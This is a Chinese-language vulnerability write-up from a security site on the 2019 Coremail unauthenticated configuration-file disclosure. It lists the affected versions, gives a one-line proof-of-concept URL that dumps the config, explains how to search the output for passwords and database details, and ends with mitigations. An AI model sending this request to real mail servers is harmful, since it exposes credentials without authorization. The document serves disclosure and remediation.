menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right Coremail配置文件信息泄漏 chevron_right Coremail配置文件信息泄漏.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    Coremail配置文件信息泄漏.md
    1.38 KB / 2021-07-15 19:49:52
        Coremail配置文件信息泄漏
    ========================
    
    一、漏洞简介
    ------------
    
    Coremail论客邮件系统开始研发于1999年,是中国第一套中文邮件系统,目前在中国大陆地区拥有超过10亿终端用户,是网易、中华网等运营商至今一直使用的邮件系统,也是政府、事业单位、科教、企业等机构广泛使用的邮件系统。
    
    2019年6月,网上流传出Coremail论客邮件系统配置文件泄露的漏洞,该漏洞无需认证即可获取邮件系统的配置文件内容。
    
    Coremail官网发布的漏洞公告:《关于Coremail邮件系统安全问题的情况说明》,http://www.coremail.cn/About/news\_x/article\_id/32641.htm
    
    二、漏洞影响
    ------------
    
    Coremail XT 3.0.1至XT 5.0.9版本,XT 5.0.9a及以上版本已修复该漏洞
    
    三、复现过程
    ------------
    
    ### POC
    
        http://mail.0-sec.org/mailsms/s?func=ADMIN:appState&dumpConfig=/
    
    输入Poc访问漏洞页面发现信息泄露页面内搜索user,password,database等关键字如下图
    
    ![](./resource/Coremail配置文件信息泄漏/media/rId25.png)
    
    ### 四、修复建议
    
    1、在不影响使用的情况下,仅允许VPN连接后才可访问;
    
    2、在Web服务器(nginx/apache)上限制外网对 /mailsms
    路径的访问。建议使用Coremail构建邮件服务器的信息系统运营者立即自查,发现存在漏洞后及时修复。
    
    
    links
    file_download